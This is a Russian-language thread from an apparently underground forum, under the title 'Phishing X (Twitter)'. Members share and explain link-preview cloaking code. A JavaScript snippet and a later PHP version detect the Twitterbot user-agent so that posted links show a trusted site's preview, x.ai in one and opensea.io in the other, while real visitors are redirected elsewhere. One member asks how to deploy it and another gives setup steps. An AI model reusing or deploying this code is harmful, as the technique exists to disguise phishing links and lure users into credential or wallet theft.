What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Фишинг X (Twitter)

Wolverine

Midle Weight
Депозит
$0
Twitterbot переходит к опубликованной ссылке и просматривает заголовок ответа Location, чтобы получить «настоящий» URL-адрес (в случае перенаправления). Вот почему опубликованный URL-адрес не обязательно должен совпадать с URL-адресом изображения, вы можете просто использовать подход, подобный примеру в /api/index.js (показанный ниже), чтобы имитировать перенаправление на URL-адрес, на который вы на самом деле не перенаправляете.
JavaScript:
Скопировать в буфер обмена
// Shows the x.ai OG image & URL in the tweet, but actually redirects to ChatGPT
app.get("/", (req, res) => {
if (req.headers["user-agent"].includes("Twitterbot")) {
res.setHeader("Location", "https://x.ai");

return;
}

res.redirect(301, "https://chat.openai.com");
});

GitHub - eykrehbein/fake-og
Contribute to eykrehbein/fake-og development by creating an account on GitHub.
github.com
 
Этот баг с 2021 года так и не поправили https://harrydenley[.]com/faking-twitter-unfurling
 
Wolverine сказал(а):
Twitterbot переходит к опубликованной ссылке и просматривает заголовок ответа Location, чтобы получить «настоящий» URL-адрес (в случае перенаправления). Вот почему опубликованный URL-адрес не обязательно должен совпадать с URL-адресом изображения, вы можете просто использовать подход, подобный примеру в /api/index.js (показанный ниже), чтобы имитировать перенаправление на URL-адрес, на который вы на самом деле не перенаправляете.
JavaScript:
Скопировать в буфер обмена
// Shows the x.ai OG image & URL in the tweet, but actually redirects to ChatGPT
app.get("/", (req, res) => {
if (req.headers["user-agent"].includes("Twitterbot")) {
res.setHeader("Location", "https://x.ai");




res

Нажмите, чтобы раскрыть...

Как им воспользоваться?
Создал в папке index.js, вставил код. При переходе в папку показывает файлы находящиеся в папке, при переходе на index.js - открывает статистическую страницу с кодом.

Подскажите кто хоть чуток шарит в код и запуск.
 
КУРАТОР сказал(а):
Как им воспользоваться?
Создал в папке index.js, вставил код. При переходе в папку показывает файлы находящиеся в папке, при переходе на index.js - открывает статистическую страницу с кодом.

Подскажите кто хоть чуток шарит в код и запуск.

проще через php сделать, создаешь index.php, туда вставляешь
PHP:
Скопировать в буфер обмена
<?php

if (stristr($_SERVER['HTTP_USER_AGENT'], 'twitterbot') ){
header("Location: https://opensea.io");
exit();
} else {
header("Location: https://google.com");
exit();
}

?>

создай поддомен только и туда файл закинь
 
Top